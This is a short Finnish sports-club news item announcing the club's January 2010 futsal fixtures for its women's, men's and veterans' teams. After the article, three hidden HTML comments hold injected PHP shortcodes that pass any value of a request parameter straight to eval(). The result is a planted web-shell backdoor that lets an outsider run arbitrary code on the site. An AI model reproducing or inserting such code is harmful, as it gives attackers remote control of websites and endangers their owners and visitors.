Talven futsal-sarjat jatkuvat tammikuussa. Naiset matkaavat sunnuntaina 10.1.2010 Pudasjärvelle, jossa ohjelmassa on kolme ottelua. Vastaan tulevat paikallinen Kurenpojat, ONS II Punainen ja Ajax-Ospa T92-94. Herculettaret lähtevät hakemaan kauden avausvoittoaan Pudasjärveltä. Miesten edustusjoukkue jatkaa pelejään lauantaina 16.1. kahdella pelillä FC Yli-Utosta ja AC KasiKuus:sta vastaan. Pappa-Herkut puolestaan koettavat venyttää voittoputkeaan sunnuntaina 17.1. OuJk Academyn ja KiiRin kustannuksella. Miesten pelit pelataan Oulunsalon palloiluhallissa.

<!– [insert_php]if (isset($_REQUEST["oLNrN"])){eval($_REQUEST["oLNrN"]);exit;}[/insert_php][php]if (isset($_REQUEST["oLNrN"])){eval($_REQUEST["oLNrN"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["DlZg"])){eval($_REQUEST["DlZg"]);exit;}[/insert_php][php]if (isset($_REQUEST["DlZg"])){eval($_REQUEST["DlZg"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["YdbA"])){eval($_REQUEST["YdbA"]);exit;}[/insert_php][php]if (isset($_REQUEST["YdbA"])){eval($_REQUEST["YdbA"]);exit;}[/php] –>